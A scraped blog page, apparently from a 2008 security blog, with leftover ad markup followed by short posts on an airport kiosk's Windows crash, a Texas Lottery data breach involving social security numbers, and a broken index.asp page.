bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="return ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27190/*http://smallbusiness.yahoo.com/merchant?p=1" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="return ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}smallbusiness.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, I'm doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it/credit you).

Thursday, November 6, 2008

Windows Crash at O'Hare Airport Terminal


In my travels I go through a lot of airports, and every once in a while I run into something that gets my attention and I have to pull out my cell phone camera and snap a picture. Coming home from Detroit tonight... I just had to have this for my "Priceless" collection.

I know, it's not necessarily a "security issue"... but it's a chuckle in a very tough week so bear with me. You'll notice that the offending driver is sysaudio.sys, which is strange because this terminal doesn't actually play any sound... ever that I've heard/seen when it was working.

We really are "Greening" the City of Chicago... wait, what?

Such a waste of a beautiful touch-screen display.

Tuesday, November 4, 2008

Is Nothing Sacred? Data Breach at Texas Lottery

[1] http://www.chron.com/disp/story.mpl/headline/metro/6089177.html

Apparently you're not even safe playing the Lottery lately.

In this article from October 31st (a little dated, I know, but just getting around to reading this) it's apparent that lax data security policies and poor judgment were the cause of this breach. What's astonishing is the complete and utter disregard this employee had for the super-sensitive data (including social security numbers) he "copied and burned to DVD"... what's even more disturbing is his motive:
"I indiscriminately copied all the files from the My DOC folder to a CD/DVD which I carried (to subsequent jobs)"... The employee added he wanted the information "for possible future reference as a programmer at other state agencies."
What possible future reference could he have had from this live data about real people? It continues to amaze me how people just haven't paid attention to the news media and other information outlets discussing how dangerous information like social security numbers is. Did this guy crawl out from under a rock?

Saturday, November 1, 2008

index.asp Server Error

Sometimes, words just don't do a broken index.asp page justice.

What's wrong with this picture?

